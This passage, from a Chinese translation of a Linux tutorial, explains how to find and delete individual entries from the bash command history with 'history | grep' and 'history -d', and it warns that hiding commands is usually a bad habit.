现在假设历史记录中已经包含了一些你不希望记录的命令。这种情况下我们怎么办？很简单。直接动手删除它们。通过下面的命令来删除：

history | grep "part of command you want to remove"

上面的命令会输出历史记录中匹配的命令，每一条前面会有个数字。

一旦你找到你想删除的命令，执行下面的命令，从历史记录中删除那个指定的项：

history -d [num]

下面是这个例子的截图。

第二个 ‘echo’命令被成功的删除了。

（LCTT 译注：如果你不希望上述命令本身也被记录进历史中，你可以在上述命令前加个空格）

同样的，你可以使用向上的箭头一直往回翻看历史记录。当你发现你感兴趣的命令出现在终端上时，按下 “Ctrl + U”清除整行，也会从历史记录中删除它。

总结

有多种不同的方法可以操作 Linux 命令行历史来满足你的需求。然而请记住，从历史中隐藏或者删除命令通常不是一个好习惯，尽管本质上这并没有错。但是你必须知道你在做什么，以及可能产生的后果。

via: https://www.maketecheasier.com/linux-command-line-history-incognito/

浅谈AWD攻防赛的生存攻略

无法查看这则摘要。请 点击此处查看博文。